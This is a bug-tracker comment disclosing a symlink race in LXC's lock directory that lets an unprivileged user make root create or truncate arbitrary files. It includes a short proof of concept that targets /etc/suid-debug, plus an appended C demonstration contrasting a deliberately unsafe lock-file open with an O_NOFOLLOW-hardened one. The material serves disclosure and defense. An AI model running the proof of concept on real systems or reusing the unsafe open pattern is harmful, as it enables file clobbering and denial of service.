Comment 0 for bug 1470842

Roman Fiedler (roman-fiedler-deactivatedaccount) wrote:

When an lxc tool, e.g. lxc-info, is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. To do so, the malicious user has to be faster than the first lxc invocation, so that /run/lock/lxc does not yet exist.

POC:

# su -s /bin/bash nobody
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/lib/lxc/somename

As root:

lxc-info --name somename

The guest "somename" has to exist; the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause a local DoS.

# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04

# apt-cache policy lxc
lxc:
  Installed: 1.0.7-0ubuntu0.1
  Candidate: 1.0.7-0ubuntu0.1
  Version table:
 *** 1.0.7-0ubuntu0.1 0
        500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
        100 /var/lib/dpkg/status
     1.0.3-0ubuntu3 0
        500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
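The pattern behind this report, as an added example that is not part of the bug report and is not LXC's own lock code: a privileged process opens a lock file under a directory another user could populate, using O_CREAT without O_NOFOLLOW, so a planted symlink makes it create or truncate the symlink's target. Beside it sits an assumed mitigation (O_NOFOLLOW plus a post-open ownership, link-count and type check), chosen for illustration rather than taken from LXC's fix. The demo runs entirely in a fresh temporary directory with a constructed "victim" file standing in for /etc/suid-debug; the victim file name, the lock name "somename" and the helper names are this example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: O_CREAT|O_TRUNC with no O_NOFOLLOW. If "path" is a
 * symlink planted by an unprivileged user, the (root) caller creates or
 * truncates whatever the symlink points to. Returns an fd or -1. */
static int open_lock_unsafe(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
}

/* Assumed mitigation (not LXC's actual patch): never follow a symlink at the
 * final component (O_NOFOLLOW makes open fail with ELOOP), never truncate,
 * and reject a pre-existing file that is not a plain, single-linked file
 * owned by us with no group/other write bits. The parent directory must
 * still be root-owned and not world-writable; that part is not shown here. */
static int open_lock_safe(const char *path)
{
    int fd = open(path, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_uid != geteuid() || (st.st_mode & 022)) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: create victim with 7 bytes of content and a symlink
 * "somename" pointing at it, exactly like the PoC's lxc/var/lib/lxc/somename.
 * Returns 0 on setup failure. */
static int setup_scenario(char *dir, size_t n, char *victim, char *link)
{
    snprintf(dir, n, "/tmp/lxc-lock-demo-XXXXXX");
    if (!mkdtemp(dir))
        return 0;
    snprintf(victim, n, "%s/victim", dir);   /* stands in for /etc/suid-debug */
    snprintf(link, n, "%s/somename", dir);
    FILE *f = fopen(victim, "w");
    if (!f)
        return 0;
    fputs("secret\n", f);
    fclose(f);
    return symlink(victim, link) == 0;
}

static void teardown(const char *dir, const char *victim, const char *link)
{
    unlink(link);
    unlink(victim);
    rmdir(dir);
}

/* Returns 1 if the unsafe open truncated the victim through the symlink. */
static int demo_unsafe_truncates(void)
{
    char dir[256], victim[256], link[256];
    if (!setup_scenario(dir, sizeof dir, victim, link))
        return -1;
    int fd = open_lock_unsafe(link);
    if (fd >= 0)
        close(fd);
    struct stat st;
    int r = (stat(victim, &st) == 0 && st.st_size == 0);
    teardown(dir, victim, link);
    return r;
}

/* Returns 1 if the hardened open refused the symlink (ELOOP) and the victim
 * kept its 7 bytes. */
static int demo_safe_refuses(void)
{
    char dir[256], victim[256], link[256];
    if (!setup_scenario(dir, sizeof dir, victim, link))
        return -1;
    int fd = open_lock_safe(link);
    int refused = (fd < 0 && errno == ELOOP);
    if (fd >= 0)
        close(fd);
    struct stat st;
    int r = refused && stat(victim, &st) == 0 && st.st_size == 7;
    teardown(dir, victim, link);
    return r;
}

int main(void)
{
    printf("unsafe open truncated victim: %d\n", demo_unsafe_truncates());
    printf("safe open refused symlink:    %d\n", demo_safe_refuses());
    return 0;
}
```

O_NOFOLLOW only protects the last path component, so an attacker who controls a parent directory (as with a missing, user-creatable /run/lock/lxc) can still redirect the path; the durable fix is a lock directory that root creates with restrictive permissions before any unprivileged user can, which this example deliberately leaves out.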